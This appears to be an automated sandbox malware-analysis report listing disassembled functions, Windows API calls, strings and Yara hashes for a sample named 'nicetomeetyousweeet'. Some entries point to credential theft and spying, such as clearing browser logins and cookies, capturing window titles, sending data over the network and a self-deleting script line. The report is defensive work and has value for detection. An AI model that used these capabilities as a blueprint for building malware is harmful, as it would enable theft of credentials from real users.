                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3360349984-0
                                                                                • Opcode ID: 0229f6fa19d053722b7b0bd2de6bf031995136bd1ae29ad34a7eeab18cb6c5a8
                                                                                • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                • Opcode Fuzzy Hash: 0229f6fa19d053722b7b0bd2de6bf031995136bd1ae29ad34a7eeab18cb6c5a8
                                                                                • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                Function 007848EF Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 007849DF
                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 007849F3
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 007849FE
                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 00784A07
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3360349984-0
                                                                                • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                • Instruction ID: dae1844cad3be1e3fbb043f49e544813a4f9596ac2cdd30d216598fae4758dd6
                                                                                • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                • Instruction Fuzzy Hash: CC41B471684345EFC715FB24DD59D7FB7EDAF80311F000A1DF896C2292DA68E90A8762
                                                                                Function 007D013A Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000006,?,00000000,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?), ref: 007D0187
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,00000006,?,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?,?), ref: 007D0210
                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,00000006,00000001,?,?,?,00000002,?), ref: 007D0222
                                                                                • __freea.LIBCMT ref: 007D022B
                                                                                  • Part of subcall function 007C6D66: RtlAllocateHeap.NTDLL(00000000,007B468A,?), ref: 007C6D98
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
                                                                                • Instruction ID: 64c03d3e27be7ac5574ad859a2720fcb82dbf2aaa8ed190ff3fc01270d7c7a86
                                                                                • Opcode Fuzzy Hash: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
                                                                                • Instruction Fuzzy Hash: 2B31AD72A0120AABDB259FA4DC49EEE7BB5EF44710F04416AFC04D6251E739DD50CBA0
                                                                                Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                • API String ID: 3472027048-1236744412
                                                                                • Opcode ID: 6c79a3abdf1ad97de70b2e63fddcf2f9fdc46bd72089c89cb8ac27af1688aa9f
                                                                                • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                • Opcode Fuzzy Hash: 6c79a3abdf1ad97de70b2e63fddcf2f9fdc46bd72089c89cb8ac27af1688aa9f
                                                                                • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                • String ID: @CG$exepath$BG
                                                                                • API String ID: 4119054056-3221201242
                                                                                • Opcode ID: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
                                                                                • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                • Opcode Fuzzy Hash: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
                                                                                • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                Function 0079178B Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007928C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 007928E0
                                                                                  • Part of subcall function 007928C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 007928F9
                                                                                  • Part of subcall function 007928C4: RegCloseKey.ADVAPI32(?), ref: 00792904
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0079182A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                • String ID: @CG$exepath$BG
                                                                                • API String ID: 4119054056-3221201242
                                                                                • Opcode ID: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
                                                                                • Instruction ID: d5ee3af90d3056cccc62c88dd6abffac78c87d3bb6c9dddf1d1336f411b7ca2d
                                                                                • Opcode Fuzzy Hash: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
                                                                                • Instruction Fuzzy Hash: 0821D691B80304A7DB24B6782C0AE7F728E8BC1751F40457AB916D72C3EF2D9D1683A9
                                                                                Function 007850B5 Relevance: 6.1, APIs: 4, Instructions: 79windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 007850D8
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00785188
                                                                                • TranslateMessage.USER32(?), ref: 00785197
                                                                                • DispatchMessageA.USER32(?), ref: 007851A2
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 0078525A
                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00785292
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                • String ID:
                                                                                • API String ID: 2956720200-0
                                                                                • Opcode ID: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
                                                                                • Instruction ID: de182435a43b848de697f8cad83a7c8f835d8c7f16c04b009f596d32f3c47e2b
                                                                                • Opcode Fuzzy Hash: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
                                                                                • Instruction Fuzzy Hash: F6219171944305ABCA14FB74DD4E9AE7BA8AB85711F400A28F91283192EF39DA09CB52
                                                                                Function 0041A98A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                • String ID:
                                                                                • API String ID: 188215759-0
                                                                                • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                Function 0079ABF1 Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                • String ID:
                                                                                • API String ID: 188215759-0
                                                                                • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                • Instruction ID: f905d1a8f291593e48d52dd2bd89694f9d1dcb5fc9edefeb253359b98a442128
                                                                                • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                • Instruction Fuzzy Hash: 87213272509305AFC704DF68D88589FB7E8EFC8754F044A2DF58597251EA34EA09CBA3
                                                                                Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                • String ID: [ $ ]
                                                                                • API String ID: 3309952895-93608704
                                                                                • Opcode ID: 8a8182bc4af9811f9c16057955931611a5d35cec57aaaf681bb90f2a4089e852
                                                                                • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                • Opcode Fuzzy Hash: 8a8182bc4af9811f9c16057955931611a5d35cec57aaaf681bb90f2a4089e852
                                                                                • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                Function 0079A053 Relevance: 6.1, APIs: 4, Instructions: 66serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0079A063
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 0079A077
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0079A084
                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0079A0B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$Open$ChangeCloseConfigHandleManager
                                                                                • String ID:
                                                                                • API String ID: 110783151-0
                                                                                • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                • Instruction ID: 6fa5a73d4b6ba11ce143f1edf9cfbd80dbeb1bca7a7dd0b4112387e0c411d4a1
                                                                                • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                • Instruction Fuzzy Hash: 2101D631149314BADA215B2CBC4EE7B3A6CDB42771F100225F522921D2EA58CD0191B2
                                                                                Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                • String ID:
                                                                                • API String ID: 3604237281-0
                                                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                Function 0079B7F6 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0079B90C,00000000,00000000,?), ref: 0079B835
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B852
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B866
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B873
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                • String ID:
                                                                                • API String ID: 3604237281-0
                                                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                • Instruction ID: 8dd89a142aed869d27d01aa8ffbe3bc3d3809f3c941656d4f51e1476ed9c200c
                                                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                • Instruction Fuzzy Hash: 0501F571209214BFEA144E24BDC9E7B739CEB8A3B9F100639FA61C22D1D765CC0586B0
                                                                                Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                • String ID:
                                                                                • API String ID: 737400349-0
                                                                                • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                Function 007C7477 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,007C741E,?,00000000,00000000,00000000,?,007C774A,00000006,0045D330), ref: 007C74A9
                                                                                • GetLastError.KERNEL32(?,007C741E,?,00000000,00000000,00000000,?,007C774A,00000006,0045D330,0045D328,0045D330,00000000,00000364,?,007C71F8), ref: 007C74B5
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007C741E,?,00000000,00000000,00000000,?,007C774A,00000006,0045D330,0045D328,0045D330,00000000), ref: 007C74C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                • Instruction ID: 36deb2a692c1a14f6afd77ec48ddffc8399fb169eceecca860e75b06281b26de
                                                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                • Instruction Fuzzy Hash: D8018432619366ABC7394A69AC44F567F98AB05BA2B11057CF906D7281DA28D900CEE4
                                                                                Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3919263394-0
                                                                                • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
